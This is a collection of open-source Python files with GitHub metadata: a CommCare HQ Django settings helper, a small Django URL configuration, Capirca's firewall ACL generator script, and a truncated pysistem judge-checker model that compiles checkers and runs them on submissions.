"ref": "refs/heads/master",
"path": "conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "36"
},
{
"name": "Python",
"bytes": "1733005"
}
],
"symlink_target": ""
} |
import logging
import os
import re
import subprocess
import sys
import tempfile
import uuid
from collections import namedtuple
from django.db.backends.base.creation import TEST_DATABASE_PREFIX
def is_testing():
return os.environ.get("CCHQ_TESTING") == "1"
class SharedDriveConfiguration(object):
def __init__(self, shared_drive_path, restore_dir, transfer_dir, temp_dir, blob_dir):
self.shared_drive_path = shared_drive_path
self.restore_dir_name = restore_dir
self.transfer_dir_name = transfer_dir
self.temp_dir_name = temp_dir
self.blob_dir_name = blob_dir
self._restore_dir = self._init_dir(restore_dir)
self.transfer_dir = self._init_dir(transfer_dir)
self.temp_dir = self._init_dir(temp_dir)
self.blob_dir = self._init_dir(blob_dir)
def _init_dir(self, name):
if not self.shared_drive_path or not os.path.isdir(self.shared_drive_path) or not name:
return None
path = os.path.join(self.shared_drive_path, name)
if not os.path.exists(path):
os.mkdir(path)
elif not os.path.isdir(path):
raise Exception('Shared folder is not a directory: {}'.format(name))
return path
def get_unset_reason(self, name):
if not self.shared_drive_path:
return "invalid shared drive path: %r" % (self.shared_drive_path,)
if not os.path.isdir(self.shared_drive_path):
return "shared drive path is not a directory: %r" % (self.shared_drive_path,)
directory = getattr(self, name + "_name")
if not directory:
return name + " is empty or not configured in settings"
return None
@property
def restore_dir(self):
return self._restore_dir or tempfile.gettempdir()
@property
def transfer_enabled(self):
from django_transfer import is_enabled
return is_enabled() and self.transfer_dir
def get_temp_file(self, suffix="", prefix="tmp"):
name = '{}{}{}'.format(prefix, uuid.uuid4().hex, suffix)
return os.path.join(self.temp_dir, name)
def get_server_url(http_method, server_root, username, password):
if username and password:
return '%(http_method)s://%(user)s:%(pass)s@%(server)s' % {
'http_method': http_method,
'user': username,
'pass': password,
'server': server_root,
}
else:
return '%(http_method)s://%(server)s' % {
'http_method': http_method,
'server': server_root,
}
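# Illustrative output of get_server_url (hostname and credentials are made up,
# not taken from any real deployment):
#
#   get_server_url('https', 'couch.example.com:5984', 'admin', 'secret')
#   # -> 'https://admin:[email protected]:5984'
#   get_server_url('http', 'localhost:5984', '', '')
#   # -> 'http://localhost:5984'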
def get_dynamic_db_settings(server_root, username, password, dbname,
use_https=False):
"""
Get dynamic database settings.
Other apps can use this if they want to change settings
"""
http_method = 'https' if use_https else 'http'
server_url = get_server_url(http_method, server_root, username, password)
database = '%(server)s/%(database)s' % {
'server': server_url,
'database': dbname,
}
return {
'COUCH_SERVER': server_url,
'COUCH_DATABASE': database,
}
def get_db_name(dbname, is_test):
"""Get databse name (possibly with test prefix)
:param is_test: Add test prefix if true.
"""
if isinstance(dbname, bytes):
dbname = dbname.decode('utf-8')
return (TEST_DATABASE_PREFIX + dbname) if is_test else dbname
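# Sketch of the prefixing behaviour (Django's TEST_DATABASE_PREFIX is 'test_';
# the database name below is hypothetical):
#
#   get_db_name('commcarehq', is_test=False)  # -> 'commcarehq'
#   get_db_name('commcarehq', is_test=True)   # -> 'test_commcarehq'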
def assign_test_db_names(dbs):
"""Fix database names for REUSE_DB
Django automatically uses test database names when testing, but
only if the test database setup routine is called. This allows us
to safely skip the test database setup with REUSE_DB.
"""
for db in dbs.values():
test_db_name = get_db_name(db['NAME'], True)
db['NAME'] = db.setdefault('TEST', {}).setdefault('NAME', test_db_name)
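# Minimal sketch of the in-place renaming above (the settings dict is made up):
#
#   dbs = {'default': {'NAME': 'commcarehq'}}
#   assign_test_db_names(dbs)
#   # dbs['default']['NAME'] == 'test_commcarehq'
#   # dbs['default']['TEST'] == {'NAME': 'test_commcarehq'}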
class CouchSettingsHelper(namedtuple('CouchSettingsHelper',
['couch_database_configs', 'couchdb_apps', 'extra_db_names', 'unit_testing'])):
def make_couchdb_tuples(self):
"""
Helper function to generate couchdb tuples
for mapping app name to couch database URL.
"""
return [self._make_couchdb_tuple(row) for row in self.couchdb_apps]
def _make_couchdb_tuple(self, row):
if isinstance(row, tuple):
app_label, postfix = row
else:
app_label, postfix = row, None
if postfix:
if postfix in self.db_urls_by_prefix:
url = self.db_urls_by_prefix[postfix]
else:
url = '%s__%s' % (self.main_db_url, postfix)
return app_label, url
else:
return app_label, self.main_db_url
def get_extra_couchdbs(self):
"""
Create a mapping from database prefix to database url
"""
extra_dbs = {}
postfixes = []
for row in self.couchdb_apps:
if isinstance(row, tuple):
_, postfix = row
if postfix:
postfixes.append(postfix)
postfixes.extend(self.extra_db_names)
for postfix in postfixes:
if postfix in self.db_urls_by_prefix:
url = self.db_urls_by_prefix[postfix]
else:
url = '%s__%s' % (self.main_db_url, postfix)
extra_dbs[postfix] = url
return extra_dbs
@property
def main_db_url(self):
return self.db_urls_by_prefix[None]
@property
def db_urls_by_prefix(self):
if not getattr(self, '_urls_by_prefix', None):
urls_by_prefix = {}
for key, config in self.couch_database_configs.items():
prefix = None if key == 'default' else key
url = self._get_db_url(config)
urls_by_prefix[prefix] = url
self._urls_by_prefix = urls_by_prefix
return self._urls_by_prefix
def _get_db_url(self, config):
return get_dynamic_db_settings(
config['COUCH_SERVER_ROOT'],
config['COUCH_USERNAME'],
config['COUCH_PASSWORD'],
get_db_name(config['COUCH_DATABASE_NAME'], self.unit_testing),
use_https=config['COUCH_HTTPS'],
)["COUCH_DATABASE"]
def celery_failure_handler(task, exc, task_id, args, kwargs, einfo):
from django_redis.exceptions import ConnectionInterrupted
from redis.exceptions import ConnectionError
if isinstance(exc, (ConnectionInterrupted, ConnectionError)):
task.retry(args=args, kwargs=kwargs, exc=exc, max_retries=3, countdown=60 * 5)
def get_allowed_websocket_channels(request, channels):
from django.core.exceptions import PermissionDenied
if request.user and request.user.is_authenticated and request.user.is_superuser:
return channels
else:
raise PermissionDenied(
'Not allowed to subscribe or to publish to websockets without '
'superuser permissions or domain membership!'
)
def fix_logger_obfuscation(fix_logger_obfuscation_, logging_config):
if fix_logger_obfuscation_:
# this is here because the logging config cannot import
# corehq.util.log.HqAdminEmailHandler, for example, if there
# is a syntax error in any module imported by corehq/__init__.py
# Setting FIX_LOGGER_ERROR_OBFUSCATION = True in
# localsettings.py will reveal the real error.
# Note that changing this means you will not be able to use/test anything
# related to email logging.
for handler in logging_config["handlers"].values():
if handler["class"].startswith("corehq."):
if fix_logger_obfuscation_ != 'quiet':
print("{} logger is being changed to {}".format(
handler['class'],
'logging.StreamHandler'
), file=sys.stderr)
handler["class"] = "logging.StreamHandler"
def configure_sentry(base_dir, server_env, dsn):
import sentry_sdk
from sentry_sdk.integrations.celery import CeleryIntegration
from sentry_sdk.integrations.django import DjangoIntegration
from sentry_sdk.integrations.logging import ignore_logger
from sentry_sdk.integrations.redis import RedisIntegration
from sentry_sdk.integrations.sqlalchemy import SqlalchemyIntegration
def _before_send(event, hint):
# can't import this during load since settings is not fully configured yet
from corehq.util.sentry import before_sentry_send
return before_sentry_send(event, hint)
release = get_release_name(base_dir, server_env)
ignore_logger('quickcache')
ignore_logger('django.template')
ignore_logger('pillowtop')
ignore_logger('restore')
ignore_logger('kafka.conn')
sentry_sdk.init(
dsn,
release=release,
environment=server_env,
request_bodies='never',
before_send=_before_send,
integrations=[
DjangoIntegration(),
CeleryIntegration(),
SqlalchemyIntegration(),
RedisIntegration()
]
)
def get_release_name(base_dir, server_env):
"""Return the release name. This should match the name of the release
created by commcare-cloud
"""
release_dir = base_dir.split('/')[-1]
if re.match(r'\d{4}-\d{2}-\d{2}_\d{2}.\d{2}', release_dir):
return "{}-{}".format(release_dir, server_env)
else:
return get_git_commit(base_dir) or 'unknown'
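# Example of the two naming paths (paths and environment are hypothetical):
#
#   get_release_name('/home/cchq/www/prod/releases/2020-01-15_10.30', 'production')
#   # -> '2020-01-15_10.30-production'      (release-style directory name)
#   get_release_name('/home/user/commcare-hq', 'staging')
#   # -> the current git commit hash, or 'unknown' outside a git checkout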
def get_git_commit(base_dir):
try:
out = subprocess.check_output(['git', 'rev-parse', 'HEAD'], cwd=base_dir)
return out.strip().decode('ascii')
    except (OSError, subprocess.CalledProcessError):
pass
def update_redis_location_for_tests(settings_caches):
if not is_testing():
raise Exception("Attempt to update Redis settings outside of tests")
for name, config in settings_caches.items():
if not config.get("BACKEND", "").startswith("django_redis"):
continue
test_location = config.get("TEST_LOCATION")
if test_location:
config["LOCATION"] = test_location
else:
logging.warning(
"Unable to set Redis DB in '%(name)s' cache for tests. Using '%(location)s'.\n"
"\tTo configure a separate Redis DB for tests add a 'TEST_LOCATION' to the"
" '%(name)s' cache configuration.", {"name": name, "location": config["LOCATION"]}
)
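# Sketch of the rewrite performed under CCHQ_TESTING=1 (cache name and URLs are
# hypothetical):
#
#   caches = {'redis': {'BACKEND': 'django_redis.cache.RedisCache',
#                       'LOCATION': 'redis://localhost:6379/0',
#                       'TEST_LOCATION': 'redis://localhost:6379/1'}}
#   update_redis_location_for_tests(caches)
#   # caches['redis']['LOCATION'] == 'redis://localhost:6379/1'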
| {
"content_hash": "1e6afd2941c06fb8faff98ef8269953f",
"timestamp": "",
"source": "github",
"line_count": 305,
"max_line_length": 105,
"avg_line_length": 34.445901639344264,
"alnum_prop": 0.6099371787549971,
"repo_name": "dimagi/commcare-hq",
"id": "e1bd0fbba8901ee91cce5b6144ef435df0b640c6",
"size": "10506",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "settingshelper.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "82928"
},
{
"name": "Dockerfile",
"bytes": "2341"
},
{
"name": "HTML",
"bytes": "2589268"
},
{
"name": "JavaScript",
"bytes": "5889543"
},
{
"name": "Jinja",
"bytes": "3693"
},
{
"name": "Less",
"bytes": "176180"
},
{
"name": "Makefile",
"bytes": "1622"
},
{
"name": "PHP",
"bytes": "2232"
},
{
"name": "PLpgSQL",
"bytes": "66704"
},
{
"name": "Python",
"bytes": "21779773"
},
{
"name": "Roff",
"bytes": "150"
},
{
"name": "Shell",
"bytes": "67473"
}
],
"symlink_target": ""
} |
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns(
    '', # First arg to patterns is a view-prefix parameter.
# A handful of views in a base app.
url(r'^$', 'base_app.views.site_index'),
url(r'^logout/$', 'base_app.views.logout'),
url(r'^create_user/$', 'base_app.views.create_user'),
url(r'^login/$', 'base_app.views.login'),
# Actual pet communication views -- most of the app is here.
url(r'^pets/', include('communication_app.urls')),
# Include the views from Asheesh's Django Optimizer
url(r'^optimizer/', include('asheeshs_django_optimizer.urls')),
# Django admin.
url(r'^admin/', include(admin.site.urls)),
)
| {
"content_hash": "62ade6533e99718556850726be7a983f",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 67,
"avg_line_length": 32.90909090909091,
"alnum_prop": 0.6588397790055248,
"repo_name": "petwitter/petwitter",
"id": "07b89e6f69705404e3b972a289d336dc75f735f2",
"size": "724",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "thesite/thesite/urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "103"
},
{
"name": "HTML",
"bytes": "6362"
},
{
"name": "JavaScript",
"bytes": "484"
},
{
"name": "Python",
"bytes": "19551"
}
],
"symlink_target": ""
} |
"""Renders policy source files into actual Access Control Lists."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
__author__ = '[email protected]'
import copy
import difflib
import dircache
import multiprocessing
import os
import sys
import types
from lib import aclgenerator
from lib import arista
from lib import aruba
from lib import brocade
from lib import cisco
from lib import ciscoasa
from lib import ciscoxr
from lib import gce
from lib import ipset
from lib import iptables
from lib import juniper
from lib import junipersrx
from lib import naming
from lib import nftables
from lib import nsxv
from lib import packetfilter
from lib import pcap
from lib import policy
from lib import speedway
from lib import srxlo
from lib import windows_advfirewall
import gflags as flags
import logging
FLAGS = flags.FLAGS
flags.DEFINE_string(
'base_directory',
'.',
'The base directory to look for acls; '
'typically where you\'d find ./corp and ./prod')
flags.DEFINE_string(
'definitions_directory',
'./def',
'Directory where the definitions can be found.')
flags.DEFINE_string(
'policy_file',
None,
'Individual policy file to generate.')
flags.DEFINE_string(
'output_directory',
'./',
'Directory to output the rendered acls.')
flags.DEFINE_boolean(
'optimize',
False,
'Turn on optimization.',
short_name='o')
flags.DEFINE_boolean(
'recursive',
True,
'Descend recursively from the base directory rendering acls')
flags.DEFINE_list(
'ignore_directories',
'DEPRECATED, def',
"Don't descend into directories that look like this string")
flags.DEFINE_integer(
'max_renderers',
10,
'Max number of rendering processes to use.')
flags.DEFINE_boolean(
'shade_check',
False,
'Raise an error when a term is completely shaded by a prior term.')
flags.DEFINE_integer(
'exp_info',
2,
'Print a info message when a term is set to expire in that many weeks.')
class Error(Exception):
"""Base Error class."""
class P4WriteFileError(Error):
"""Error when there are issues p4 editing the destination."""
class ACLGeneratorError(Error):
"""Raised when an ACL generator has errors."""
class ACLParserError(Error):
"""Raised when the ACL parser fails."""
# Workaround http://bugs.python.org/issue1515, needed because of
# http://codereview.appspot.com/4523073/.
# (more: http://code.google.com/p/ipaddr-py/issues/detail?id=84)
# TODO(watson): Can be removed once we run under python >=2.7
def _deepcopy_method(x, memo):
return type(x)(x.im_func, copy.deepcopy(x.im_self, memo), x.im_class)
copy._deepcopy_dispatch[types.MethodType] = _deepcopy_method
def SkipLines(text, skip_line_func=False):
"""Difflib has problems with the junkline func. fix it.
Args:
    text: list of lines to scan
skip_line_func: function to use to check if we should skip a line
Returns:
ret_text: text(list) minus the skipped lines
"""
if not skip_line_func:
return text
return [x for x in text if not skip_line_func(x)]
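# Illustrative call (the skip function and lines are made up):
#
#   SkipLines(['permit ip any any', '! $Id: x $', 'deny ip any any'],
#             skip_line_func=lambda line: line.startswith('!'))
#   # -> ['permit ip any any', 'deny ip any any']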
def RenderFile(input_file, output_directory, definitions,
exp_info, write_files):
"""Render a single file.
Args:
input_file: the name of the input policy file.
output_directory: the directory in which we place the rendered file.
definitions: the definitions from naming.Naming().
exp_info: print a info message when a term is set to expire
in that many weeks.
write_files: a list of file tuples, (output_file, acl_text), to write
"""
logging.debug('rendering file: %s into %s', input_file,
output_directory)
pol = None
jcl = False
acl = False
asacl = False
aacl = False
bacl = False
eacl = False
gcefw = False
ips = False
ipt = False
spd = False
nsx = False
pcap_accept = False
pcap_deny = False
pf = False
srx = False
jsl = False
nft = False
win_afw = False
xacl = False
try:
conf = open(input_file).read()
logging.debug('opened and read %s', input_file)
except IOError as e:
logging.warn('bad file: \n%s', e)
raise
try:
pol = policy.ParsePolicy(
conf, definitions, optimize=FLAGS.optimize,
base_dir=FLAGS.base_directory, shade_check=FLAGS.shade_check)
except policy.ShadingError as e:
logging.warn('shading errors for %s:\n%s', input_file, e)
return
except (policy.Error, naming.Error):
raise ACLParserError('Error parsing policy file %s:\n%s%s' % (
input_file, sys.exc_info()[0], sys.exc_info()[1]))
platforms = set()
for header in pol.headers:
platforms.update(header.platforms)
if 'juniper' in platforms:
jcl = copy.deepcopy(pol)
if 'cisco' in platforms:
acl = copy.deepcopy(pol)
if 'ciscoasa' in platforms:
asacl = copy.deepcopy(pol)
if 'brocade' in platforms:
bacl = copy.deepcopy(pol)
if 'arista' in platforms:
eacl = copy.deepcopy(pol)
if 'aruba' in platforms:
aacl = copy.deepcopy(pol)
if 'ipset' in platforms:
ips = copy.deepcopy(pol)
if 'iptables' in platforms:
ipt = copy.deepcopy(pol)
if 'nsxv' in platforms:
nsx = copy.deepcopy(pol)
if 'packetfilter' in platforms:
pf = copy.deepcopy(pol)
if 'pcap' in platforms:
pcap_accept = copy.deepcopy(pol)
pcap_deny = copy.deepcopy(pol)
if 'speedway' in platforms:
spd = copy.deepcopy(pol)
if 'srx' in platforms:
srx = copy.deepcopy(pol)
if 'srxlo' in platforms:
jsl = copy.deepcopy(pol)
if 'windows_advfirewall' in platforms:
win_afw = copy.deepcopy(pol)
if 'ciscoxr' in platforms:
xacl = copy.deepcopy(pol)
if 'nftables' in platforms:
nft = copy.deepcopy(pol)
if 'gce' in platforms:
gcefw = copy.deepcopy(pol)
if not output_directory.endswith('/'):
output_directory += '/'
try:
if jcl:
acl_obj = juniper.Juniper(jcl, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if srx:
acl_obj = junipersrx.JuniperSRX(srx, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if acl:
acl_obj = cisco.Cisco(acl, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if asacl:
      acl_obj = ciscoasa.CiscoASA(asacl, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if aacl:
acl_obj = aruba.Aruba(aacl, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if bacl:
acl_obj = brocade.Brocade(bacl, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if eacl:
acl_obj = arista.Arista(eacl, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if ips:
acl_obj = ipset.Ipset(ips, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if ipt:
acl_obj = iptables.Iptables(ipt, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if nsx:
acl_obj = nsxv.Nsxv(nsx, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if spd:
acl_obj = speedway.Speedway(spd, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if pcap_accept:
acl_obj = pcap.PcapFilter(pcap_accept, exp_info)
RenderACL(str(acl_obj), '-accept' + acl_obj.SUFFIX, output_directory,
input_file, write_files)
if pcap_deny:
acl_obj = pcap.PcapFilter(pcap_deny, exp_info, invert=True)
RenderACL(str(acl_obj), '-deny' + acl_obj.SUFFIX, output_directory,
input_file, write_files)
if pf:
acl_obj = packetfilter.PacketFilter(pf, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if win_afw:
acl_obj = windows_advfirewall.WindowsAdvFirewall(win_afw, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if jsl:
acl_obj = srxlo.SRXlo(jsl, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if xacl:
acl_obj = ciscoxr.CiscoXR(xacl, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if nft:
acl_obj = nftables.Nftables(nft, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if gcefw:
acl_obj = gce.GCE(gcefw, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
# TODO(robankeny) add additional errors.
except (juniper.Error, junipersrx.Error, cisco.Error, ipset.Error,
iptables.Error, speedway.Error, pcap.Error,
aclgenerator.Error, aruba.Error, nftables.Error, gce.Error):
raise ACLGeneratorError('Error generating target ACL for %s:\n%s%s' % (
input_file, sys.exc_info()[0], sys.exc_info()[1]))
def RenderACL(acl_text, acl_suffix, output_directory, input_file, write_files):
"""Write the ACL string out to file if appropriate.
Args:
    acl_text: Rendered output of an ACL generator
acl_suffix: File suffix to append to output filename
output_directory: The directory to write the output file
input_file: The name of the policy file that was used to render ACL
write_files: a list of file tuples, (output_file, acl_text), to write
"""
output_file = os.path.join(output_directory, '%s%s') % (
os.path.splitext(os.path.basename(input_file))[0], acl_suffix)
if FilesUpdated(output_file, acl_text):
logging.info('file changed: %s', output_file)
write_files.append((output_file, acl_text))
else:
logging.debug('file not changed: %s', output_file)
def FilesUpdated(file_name, file_string):
"""Diff the rendered acl with what's already on disk."""
try:
conf = open(file_name).read()
except IOError:
return True
p4_id = '$I d:'.replace(' ', '')
p4_date = '$Da te:'.replace(' ', '')
p4_revision = '$Rev ision:'.replace(' ', '')
p4_tags = lambda x: p4_id in x or p4_date in x or p4_revision in x
checked_in_text = SkipLines(conf.split('\n'), skip_line_func=p4_tags)
new_text = SkipLines(file_string.split('\n'), skip_line_func=p4_tags)
  diff = list(difflib.unified_diff(checked_in_text, new_text))
  if diff:
    logging.debug('\n'.join(diff))
    return True
  return False
def DescendRecursively(input_dirname, output_dirname, definitions, depth=1):
"""Recursively descend from input_dirname looking for policy files to render.
Args:
input_dirname: the base directory.
output_dirname: where to place the rendered files.
definitions: naming.Naming object
    depth: integer, used for outputting '---> rendering prod/corp-backbone.jcl'
Returns:
the files that were found
"""
# p4 complains if you try to edit a file like ./corp//corp-isp.jcl
input_dirname = input_dirname.rstrip('/')
output_dirname = output_dirname.rstrip('/')
files = []
# calling all directories
for curdir in [x for x in dircache.listdir(input_dirname) if
os.path.isdir(input_dirname + '/' + x)]:
# be on the lookout for a policy directory
if curdir == 'pol':
for input_file in [x for x in dircache.listdir(input_dirname + '/pol')
if x.endswith('.pol')]:
files.append({'in_file': os.path.join(input_dirname, 'pol', input_file),
'out_dir': output_dirname,
'defs': definitions})
else:
# so we don't have a policy directory, we should check if this new
# directory has a policy directory
if curdir in FLAGS.ignore_directories:
continue
logging.warn('-' * (2 * depth) + '> %s' % (
input_dirname + '/' + curdir))
files_found = DescendRecursively(input_dirname + '/' + curdir,
output_dirname + '/' + curdir,
definitions, depth + 1)
logging.warn('-' * (2 * depth) + '> %s (%d pol files found)' % (
input_dirname + '/' + curdir, len(files_found)))
files.extend(files_found)
return files
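# Example of the returned structure (directory names are hypothetical): given a
# base directory './policies' containing 'corp/pol/corp-border.pol', calling
# DescendRecursively('./policies', './filters', definitions) yields
#   [{'in_file': './policies/corp/pol/corp-border.pol',
#     'out_dir': './filters/corp',
#     'defs': definitions}]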
# TODO(robankeny): Clean up this area to make it easier to abstract our writer.
def WriteFiles(write_files):
"""Writes files to disk.
Args:
write_files: List of file names and strings.
"""
if write_files:
logging.info('writing %d files to disk...', len(write_files))
else:
logging.info('no files changed, not writing to disk')
for output_file, file_string in write_files:
try:
output = open(output_file, 'w')
except IOError:
logging.warn('error while writing file: %s', output_file)
raise
logging.info('writing file: %s', output_file)
output.write(file_string)
output.flush()
def main(args):
FLAGS(args)
  logging.debug('binary: %s\noptimize: %d\nbase_directory: %s\n'
'policy_file: %s\nrendered_acl_directory: %s',
str(sys.argv[0]),
int(FLAGS.optimize),
str(FLAGS.base_directory),
str(FLAGS.policy_file),
str(FLAGS.output_directory))
definitions = None
try:
definitions = naming.Naming(FLAGS.definitions_directory)
except naming.NoDefinitionsError:
logging.fatal('bad definitions directory: %s', FLAGS.definitions_directory)
  # thread-safe list for storing files to write
manager = multiprocessing.Manager()
write_files = manager.list()
with_errors = False
if FLAGS.policy_file:
# render just one file
logging.info('rendering one file')
RenderFile(FLAGS.policy_file, FLAGS.output_directory, definitions,
FLAGS.exp_info, write_files)
else:
# render all files in parallel
logging.info('finding policies...')
pols = []
pols.extend(DescendRecursively(FLAGS.base_directory, FLAGS.output_directory,
definitions))
pool = multiprocessing.Pool(processes=FLAGS.max_renderers)
results = []
for x in pols:
results.append(pool.apply_async(RenderFile,
args=(x.get('in_file'),
x.get('out_dir'),
definitions,
FLAGS.exp_info,
write_files)))
pool.close()
pool.join()
for result in results:
try:
result.get()
except (ACLParserError, ACLGeneratorError) as e:
with_errors = True
logging.warn('\n\nerror encountered in rendering process:\n%s\n\n', e)
# actually write files to disk
WriteFiles(write_files)
if with_errors:
logging.warn('done, with errors.')
sys.exit(1)
else:
logging.info('done.')
if __name__ == '__main__':
main(sys.argv)
| {
"content_hash": "79750cfc1bde75f9eabd7bb478ce74b2",
"timestamp": "",
"source": "github",
"line_count": 487,
"max_line_length": 80,
"avg_line_length": 31.917864476386036,
"alnum_prop": 0.6405043746783324,
"repo_name": "ryantierney513/capirca",
"id": "e179cf0eec4fa59edcab6ff797fd2160e17fbda3",
"size": "16164",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "aclgen.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "PHP",
"bytes": "736"
},
{
"name": "Python",
"bytes": "920361"
},
{
"name": "Shell",
"bytes": "909"
}
],
"symlink_target": ""
} |
"""Checker models"""
import tempfile
import os
from subprocess import Popen, PIPE, STDOUT
from pysistem import app, db
from pysistem.problems.model import Problem
from pysistem.submissions.const import STR_RESULT, STR_STATUS, STATUS_CWAIT
from pysistem.submissions.const import STATUS_WAIT, STATUS_COMPILEFAIL, STATUS_DONE
from pysistem.submissions.const import STATUS_ACT, STATUS_CHECKING, STATUS_COMPILING
from pysistem.submissions.const import RESULT_OK, RESULT_IE, RESULT_SV, RESULT_ML
from pysistem.submissions.const import RESULT_TL, RESULT_RE, RESULT_WA, RESULT_PE
try:
from pysistem.conf import DIR
except: # pragma: no cover
from pysistem.conf_default import DIR
class Checker(db.Model):
"""A submission runner
Fields:
id -- unique checker identifier
name -- checker name
source -- checker source
status -- checker status, see pysistem.submissions.const
compile_log -- compilation log produced by compiler
Relationships:
problem, problem_id -- problem, whose checker it is
compiler, compiler_id -- compiler used to compile this checker
"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(256))
source = db.Column(db.Text)
status = db.Column(db.Integer)
compile_log = db.Column(db.Text)
problem_id = db.Column(db.Integer, db.ForeignKey('problem.id'))
compiler_id = db.Column(db.Integer, db.ForeignKey('compiler.id'))
def __init__(self, name='', source='', problem=None):
self.name = name
self.source = source
self.status = STATUS_CWAIT
self.compile_log = ''
if isinstance(problem, int): # pragma: no cover
problem = Problem.query.get(problem)
self.problem = problem
def __repr__(self):
return '<Checker %r>' % self.name
def get_exe_path(self):
"""Return the pathname of checker's binary file"""
STORAGE = app.config['STORAGE']
return STORAGE + '/checkers_bin/' + str(self.id)
def get_ext(self):
"""Get checker source file extension"""
return self.compiler.lang
    def get_src_path(self):
        """Return the pathname of the checker's source file in the work directory"""
        return DIR + '/work/work/checker_%d.%s' % (self.id, self.get_ext())
    def get_result(self):
        """Return an HTML snippet describing the checker's compilation result"""
if self.status in [STATUS_DONE, STATUS_ACT]:
return '<span class="text-success">%s</span>' % STR_RESULT[RESULT_OK]
if self.status in [STATUS_COMPILEFAIL]:
return '<span class="text-danger">%s</span>' % STR_STATUS[STATUS_COMPILEFAIL]
return STR_STATUS[self.status] # pragma: no cover
def compile(self):
"""Compile checker, must be called before using checker on every checking machine"""
if self.status not in [STATUS_CWAIT, STATUS_COMPILEFAIL, STATUS_WAIT]: # pragma: no cover
            return False, b''
self.status = STATUS_COMPILING
db.session.commit()
with open(self.get_src_path(), "w") as file:
file.write(self.source)
success, stdout = self.compiler.compile(self.get_src_path(), self.get_exe_path())
try:
os.remove(self.get_src_path())
        except OSError:
            pass
self.compile_log = stdout
if success:
self.status = STATUS_DONE
self.set_act()
else:
self.status = STATUS_COMPILEFAIL
db.session.commit()
return success, stdout
def set_act(self):
"""Set as active checker for problem, works only if checker compiled successfully"""
if self.status == STATUS_DONE:
self.problem.checkers.filter(Checker.status == STATUS_ACT) \
.update({"status": STATUS_DONE})
self.status = STATUS_ACT
db.session.commit()
return True
else:
return False
def check_test(self, submission, test):
"""Run submission on test. For internal use.
Arguments:
submission -- Submission object for checking
test -- TestPair object for checking
Returns:
Tuple: (Checker output, Submission output)
"""
submission.current_test_id = test.id
cstdout = b''
result, stdout, stderr = submission.run(test.input, submission.problem.time_limit,
submission.problem.memory_limit,
commit_waiting=False)
subres = RESULT_OK
if result & 8:
subres = RESULT_IE
elif result & 16:
subres = RESULT_SV
elif result & 4:
subres = RESULT_ML
elif result & 1:
subres = RESULT_TL
elif result & 2:
subres = RESULT_RE
if subres == RESULT_OK:
# NOTHING WRONG: CHECK FOR OK/WA/PE
input_path = tempfile.gettempdir() + '/pysistem_checker_input_' + \
str(submission.id) + '_' + str(test.id)
output_path = tempfile.gettempdir() + '/pysistem_checker_output_' + \
str(submission.id) + '_' + str(test.id)
pattern_path = tempfile.gettempdir() + '/pysistem_checker_pattern_' + \
str(submission.id) + '_' + str(test.id)
with open(input_path, 'w') as input_file, \
open(output_path, 'w') as output_file, \
open(pattern_path, 'w') as pattern_file:
print(test.input, file=input_file)
print(test.pattern, file=pattern_file)
print(stdout.decode(), file=output_file)
cmd = [self.get_exe_path(), input_path, output_path, pattern_path]
proc = Popen(cmd, stdout=PIPE, stderr=STDOUT)
cstdout, cstderr = proc.communicate()
returncode = proc.returncode
os.remove(input_path)
os.remove(output_path)
os.remove(pattern_path)
if returncode in [0, 0xAC]:
subres = RESULT_OK
elif returncode in [1, 0xAB]:
subres = RESULT_WA
elif returncode in [2, 0xAA]:
subres = RESULT_PE
else:
subres = RESULT_IE
submission.result = subres
if submission.result == RESULT_OK:
submission.score += test.test_group.score_per_test
return cstdout.decode(), stdout.decode()
def check(self, submission, session=None):
"""(Re)check submission. For internal use.
Arguments:
submission -- Submission object for checking
session -- SQLAlchemy session object to use. Default -- db.session
Returns:
pysistem.submissions.const -- Submission's result
"""
print("Starting checking", submission);
session = session or db.session
from pysistem.submissions.model import SubmissionLog
submission.result = RESULT_OK
submission.status = STATUS_CHECKING
submission.score = 0
submission.check_log = ''
last_result = RESULT_OK
for submission_log in session.query(SubmissionLog).filter(
SubmissionLog.submission_id == submission.id):
            session.delete(submission_log)
session.commit()
from pysistem.test_pairs.model import TestPair, TestGroup
for test_group in session.query(TestGroup) \
.filter(self.problem_id == TestGroup.problem_id):
all_passed = True
for test in session.query(TestPair) \
.filter(test_group.id == TestPair.test_group_id):
